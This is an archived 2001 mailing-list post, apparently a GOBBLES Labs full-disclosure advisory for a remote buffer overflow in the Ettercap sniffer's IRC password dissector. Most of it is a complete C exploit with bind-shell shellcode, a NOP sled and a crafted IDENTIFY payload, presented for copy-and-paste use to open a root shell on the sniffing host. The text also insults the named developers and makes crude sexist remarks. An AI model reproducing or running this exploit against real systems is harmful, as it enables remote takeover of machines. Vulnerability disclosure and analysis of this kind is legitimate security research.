Hello Readers, GOBBLES Labs full disclosure advisory + exploit for popular sniffer Ettercap. Do not confuse this with GOBBLES-11.txt or GOBBLES-own-ettercap.c ; this is one of the many remote exploits we wrote for this program. GOBBLES Labs http://www.bugtraq.org ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++GOBBLES+SECURITY+RESEARCH+TEAM+INCORPORATED+++++++++++++++++ ALERT! GOBBLES FULL DISCLOSE REMOTE ROOT HOLE IN SUPER SNIFFER! ALERT! ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ OK world here is story on exploit. GOBBLES wrote advisory and exploit for silly condition in penetrator tool Ettercap which where it was not too fatal a bug as a kind wakeup call to programmers AlOr and nAgOr of the sniffer to let them know they software have bugs and that they should now do sourcecode audit to remove that and other exploitable bug from they program but instead all they do is bitch and moan about GOBBLES not telling them of all other holes GOBBLES find in software and how GOBBLES disclosure policy is bad for scene. GOBBLES think pissy insecure childish code is bad for scene and that Ettercap elitist programmer attitudes are bad for scene when they too stupid to understand simple programming insecurities. Now GOBBLES shame them with remote exploit for Ettercap. GOBBLES hope to have made it sufficiently penetrator proof, but ehh, who know! Some are getting sophisticated enough to use blackhat trojaned warez binaries in penetration testing for the big dollar and letting blackhat onto customer network via sophisticated backdoored binaries when blackhat normally have to use GOBBLES-Firewall1-bypass.c =). http://www.thievco.com/advisories/nspreferences.html <- why vuln-dev owns! PRODUCT ******* Ettercap website: http://ettercap.sourceforge.net SECURITY HISTORY **************** GOBBLES did publish advisory on Ettercap hole in previous GOBBLES Advisory which can be viewed at below link: http://www.bugtraq.org/dev/GOBBLES-11.txt and Alicia [GOBBLES] did write full disclosure root getting exploit for that gaping hole which can be viewed at below link: http://www.bugtraq.org/exploits/GOBBLES-own-ettercap.c and some other yahoo write some dumb exploit for same hole that was to par with securityfocus.com standards of poorly written code for publication who does not get any link from GOBBLES because that person is idiot who cannot do exploit on he own. DESCRIPTION *********** GOBBLES do humbly offer he copy/paste skills to all penetrators reading: [ettercap.gif] 0.6.2 RELEASED !! Short Description: Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. It's possible to sniff in four modes. + IP Based, the packets are filtered on IP source and dest + MAC Based, packets filtered on mac address, useful to sniff connections through gateway + ARP based, uses arp poisoning to sniff in switched lan between two hosts (full-duplex). + PublicARP based, uses arp poisoning to sniff in switched lan from a victim host to all other hosts (half-duplex). Cool Features: Characters injection in an established connection : you can inject character to server (emulating commands) or to client (emulating replies) maintaining the connection alive !! SSH1 support : you can sniff User and Pass, and even the data of an SSH1 connection. ettercap is the first software capable to sniff an SSH connection in FULL-DUPLEX HTTPS support : you can sniff http SSL secured data... and even if the connection is made through a PROXY Plug-ins support : You can create your own plugin using the ettercap's API. Password collector for : TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE (other protocols coming soon...) Paket filtering/dropping: You can set up a filter that search for a particular string (even hex) in the TCP or UDP payload and replace it with yours or drop the entire packet. OS fingerprint: you can fingerprint the OS of the victim host and even its network adapter Kill a connection: from the connections list you can kill all the connections you want Passive scanning of the LAN: you can retrive infos about: hosts in the lan, open ports, services version, type of the host (gateway, router or simple host) and extimated distance in hop. Interface: All this feature are integrated with a easy-to-use and pleasureful ncurses interface. (see screenshots) Platform: Linux 2.0.x Linux 2.2.x Linux 2.4.x FreeBSD 4.x OpenBSD 2.[789] NetBSD 1.5 Mac OS X (darwin 1.3.x) Required Library: It doesn't require any lib such as libpcap, libnet or libnids, even ncurses is not necessary, but strongly recommended ;) If you want SSH1 and/or HTTPS support, ettercap requires OpenSSL libraries Hehehe GOBBLES was able to reuse old advisory for this one since all the old cruft still apply here hehehe! Save GOBBLES time of opening webbrowser to silly sourceforge.net site and exhibiting same old skills of copy/paste but hehehe at least we are not commercial point and click penetrators. BACKGROUND ********** rfp (from wiretrip.net and vulnwatch.org) suggest to GOBBLES that sometimes GOBBLES advisories become too "fluffy" so now GOBBLES decide to be lazy and not write much here for this advisory other than copy/paste from he email client Pine: I hope too... with the help of everyone who finds a bug in it. Not as goobbles said, without telling us the bugs because we have to find it ourself. This is a leet way of thinking an not a good way to improve the community. bye --==> ALoR <==---------------------- - - - ettercap project : http://ettercap.sourceforge.net e-mail: alor (at) users (dot) sourceforge (dot) net [ Note: This message contains email list management information ] Hehehe GOBBLES think AlOr do good enough job of insults too maybe now AlOr learn to spell GOBBLES right with correct case sensitive text. GOBBLES think that GOBBLES leet way of thinking do benefit community by making security program programmers learn how to program they software securely, idiots. SPECIFICS STUFF *************** GOBBLES say see attached exploit to advisory for information on exactly how this particular exploit work (understanding will need skilled penetrator with basic knowledge of C programming language should go read some K&R book on subject for help). Problem is bufferoverflow in ec_dissector_irc.c and other places which basically let you send PRIVMSG of identify exploit to own sniffer remotely =). WORKAROUNDS *********** GOBBLES previous advice on subject was to not sniff your network because the only reasons to sniff networks is to do bad evil penetrator things, or run silly things like Snort that don't really do much but tell you what exploit just owned you. Anyhow ways to avoid this particular exploit from working include not letting user use IRC with strict firewall rules then possibly this would not work as easily. Anyhow GOBBLES think anyone who use IRC know how to circumvent most security mechanisms already anyways hehehehe. --------------begin copy/paste/grep/etc here----------------------------- /* GOBBLES-own-ettercap-remote-with-irc.c --------======== GOBBLES Labs ========------ we humbly present to you one of our remote exploits for ettercap, a sniffer written by guys who make fun of GOBBLES. they pretend that GOBBLES members have no skills and they behave like they are gods. if you are going to pursue a career in security, you should first learn the basics of writing secure applications. next time you try to use your m4d 31337 k0d3r sk33lz and ridicule other security mechanisms, make sure you aren't opening yourself up to worse riducule than you exhibit to others, because GOBBLES will bite you in the ass. From main.h: ... typedef struct connection // connection list { char source_ip[16]; char dest_ip[16]; char source_mac[20]; char dest_mac[20]; u_long fast_source_ip; u_long fast_dest_ip; u_short source_port; u_short dest_port; u_long source_seq; u_long dest_seq; char flags; char proto; short datalen; char status[8]; char type[18]; // from /etc/services char user[30]; // pay attention on buffer overflow !! char pass[30]; char info[150]; // additional info... ( smb domain, http page ...) } CONNECTION; ... on ec_dissector_irc.c ... if ( !strncasecmp(collector, "IDENTIFY ", 9)) { char nick[25] = ""; char *pass = strstr(collector, " ") + 1; if (*pass == ':') pass += 1; strcpy(data_to_ettercap->pass, pass); <--- WHOA!! WHOA!! WHOA!!! strcat(data_to_ettercap->pass, "\n"); Dissector_StateMachine_GetStatus(data_to_ettercap, nick); if (!strcmp(nick, "")) strcpy(nick, "unknown (reg. before)"); sprintf(data_to_ettercap->user, "%s\n", nick); sprintf(data_to_ettercap->info, "/identify password"); } ... how about watching for overflows on the pass[]? sure, md5 lets you pursue passwords up to 256 in length (not that many people use it), BUT if someone decides to send a password that is longer, is it really worth letting your program get owned? btw, when is the frag support coming? i want to write exploits for three other overflows that need more than 1500 bytes because of the variables... :) Cristina [GOBBLES] */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/wait.h> #include <sys/stat.h> #include <sys/time.h> #include <netinet/in.h> #include <netdb.h> #include <fcntl.h> #include <time.h> #include <wait.h> #include <errno.h> #define BUFFSIZE 2048 #define ALIGN 0 #define OFFSET 0 static char shellcode[]= "\xeb\x4b\x5f\x87\xfe\x29\xc0\x29\xdb\x40\x89\x46\x04\x40\x89\x06\xb0\x06\x89" "\x46\x08\xb0\x66\x43\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x80" "\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x29\xc0\x89\x46\x10\xb0\x10\x89\x46" "\x08\xb0\x66\x43\xcd\x80\x29\xc0\x40\x89\x46\x04\xb3\x04\xb0\x66\xcd\x80\xeb" "\x02\xeb\x4c\x29\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\x43\xcd\x80\x88\xc3\x29" "\xc9\xb0\x3f\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\xb8\x2e\x62\x69" "\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46\x04\x29\xc0\x88\x46\x07\x89" "\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x29\xc0" "\x40\xcd\x80\xe8\x62\xff\xff\xff"; void usage(char *name) { fprintf(stderr, "Usage: %s -o <offset> -a <align> -s <server>\n", name); exit(0); } int conexion(u_long victim) { int sockfd; struct sockaddr_in hostaddr; if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("conexion"); exit(-1); } hostaddr.sin_port = htons(6667); hostaddr.sin_addr.s_addr = victim; hostaddr.sin_family = AF_INET; if((connect(sockfd, (struct sockaddr *) &hostaddr, sizeof(hostaddr))) < 0 ) { perror("conexion"); exit(-1); } return sockfd; } unsigned long resolver (char *serv) { struct sockaddr_in sinn; struct hostent *hent; hent = gethostbyname (serv); bzero ((char *) &sinn, sizeof (sinn)); memcpy ((char *) &sinn.sin_addr, hent->h_addr, hent->h_length); return sinn.sin_addr.s_addr; } int attack(int offset, int align, int buffsize, int victima) { int sockfd, retval, i; fd_set rfds; struct timeval timer; char tmp[255]; char *command; unsigned long addr; command = (char *)malloc(buffsize + 1); //Writting the exploit fprintf(stderr, "* Creating payload \t\t...\t"); addr = 0xbfffffff - offset; // Go fetch bitch for(i = 0; i < buffsize; i += 4) { *(unsigned long *)&command[i] = 0x90909090; } for(i = buffsize - 120; i < buffsize; i += 4) { *(unsigned long *)&command[i] = addr; } memcpy(command, "PRIVMSG nickserv IDENTIFY ", strlen("PRIVMSG nickserv identify ")); memcpy(command + buffsize - 120 + align - strlen(shellcode), shellcode, strlen(shellcode)); fprintf(stderr, "DONE.\n\n"); fprintf(stderr, "* Connecting to irc server \t...\t"); sockfd = conexion(victima); fprintf(stderr, "DONE\n\n"); fprintf(stderr, "* Sending payload \t\t...\t"); FD_ZERO(&rfds); FD_SET(sockfd, &rfds); timer.tv_sec = 5; timer.tv_usec = 0; retval = select(sockfd + 1, NULL, &rfds, NULL, &timer); if(retval) { write(sockfd, command, strlen(command)); for(i = 0; i < 255; i++) { tmp[i] = '\0'; } read(sockfd, tmp, sizeof(tmp)); close(sockfd); } else { printf("Timeout!\n"); close(sockfd); exit(-1); } fprintf(stderr, "DONE\n\n"); fprintf(stderr, "* Have fun thank you for using Gobbles Labs, port 0x8000 of ettercap idiot should be opened now\n\n"); return 0; } int main(int argc, char **argv) { char opt; int buffsize = BUFFSIZE; int align = ALIGN; int offset = OFFSET; char *server; if((argc == 1) || (argc > 7)) { usage(argv[0]); } fprintf(stderr, "------------------------------\n"); fprintf(stderr, "GOBBLES Labs remote-ettercap\n"); fprintf(stderr, "0hday exploit\n"); fprintf(stderr, "------------------------------\n\n"); while((opt = getopt(argc, argv, "o:a:s:")) != EOF) { switch(opt) { case 'o': offset = atoi(optarg); break; case 'a': align = atoi(optarg); break; case 's': server = (char *)malloc(strlen(optarg) + 1); server = optarg; break; default: usage(argv[0]); break; } } attack(offset, align, buffsize, resolver(server)); return 0; } --------end copy/paste/grep/etc here------------------------------------ Hehehehe good work to Cristina [GOBBLES] on this one! GOBBLES Labs have two of the leetest chicks in the hacking world coding exploits! Don't all you geeks wish you had hot hacker babes in your crew like GOBBLES does? GREETS ****** dianora, tsk, snow, carolyn meinel, john vranesevich, steve gibson, kimble, knightmare, emmanuel goldstein, box.sk, @stake, securityfocus, sans.org, blackhat.com, defcon.org, 2600.com, #phrack@efnet, #hackphreak@undernet, bugtraq (thanks aleph1 and david ahmad for devoting your time to a great list), ntbugtraq (russel the love muscle ;D), cert.org, paul vixie, vesselin bontchev, reese witherspoon, kirsten dunst, katie holmes, aleister crowley, manly p hall, franz bardon, dennis ritchie, nietzsche, w. richard stevens, radiohead, george michael, larry wall, beethoven, francis bacon, bruce willis, bruce schneier, alan turing, john von neumann, donald knuth, michael abrash, robert sedgewick, richard simmons, government boy, ralph lauren, kevin mitnick, david koresh, the violent femmes, legions of doom, quentin tarantino, JUPES, security.nnov.ru, dugsong, wayne gretzky, hhp-programming.net, so1o, the HaX0R bRoThErS, nasa.gov, alfred hitchcock, ray bradbury, linux torvalds, alyssa milano, sarah michelle geller, jennifer lopez, catherine zeta jones, robert de niro, plato, leonardo da vinci, nostradamus, adam weishaupt, adema, kmfdm, eliphas levi, john dee, goo goo dolls, savage garden, george bush, john howard, tony blair, ashida kim, andrew tanenbaum, comp.lang.c, solar designer, patanjali, vayu siddhi, deepak chopra, ajna chakra, fuzzy bunny, lockdown, bronc buster, attrition.org, cliff stoll, bill gates, alan cox, george harrison, berkeley.edu, microsoft.com, isox, american mcgee, princess toadstool, ru paul, sharon stone, taeho oh, napster, nocarrier, steve wozniak, captian crunch, tony the tiger, julliette lewis, oliver twist, yakko, wakko (but no dot), santa claus, the easter bunny, the christmas tree, hacktech.org, mixter and the rest of #darknet/2xs, the planet Pluto, pluto the dog (from walt disney), walt disney, the smurfs (papa and lady, not .0 and .255), packetstormsecurity.org, chocolate, caramel, marshmallows, rice crispies, rice crispie treats, cousin WOBBLES@bindview, rfp, Alan@packetstorm, george bush senior, george w. bush, his drunken daughters (they're hot!), and all our friends and family.
This archive was generated by hypermail 2b30 : Wed Dec 12 2001 - 14:43:20 PST